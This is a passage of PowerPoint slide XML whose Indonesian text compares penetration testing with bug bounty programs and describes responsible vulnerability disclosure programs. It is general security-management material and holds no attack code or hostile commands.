              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jadwal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diprediksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, program bug bounty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peneliti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>independen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Imbalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melaporkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insentif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peneliti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membawa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keterampilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perspektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beragam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpotensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengungkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> penetration testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertarget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Program bug bounty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disukai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanfaatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keterampilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kolektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> global. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keduanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kombinasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan program bug bounty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komprehensif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengungkapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendorong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melaporkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbaiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengungkapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panduan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melaporkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penghargaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengakuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
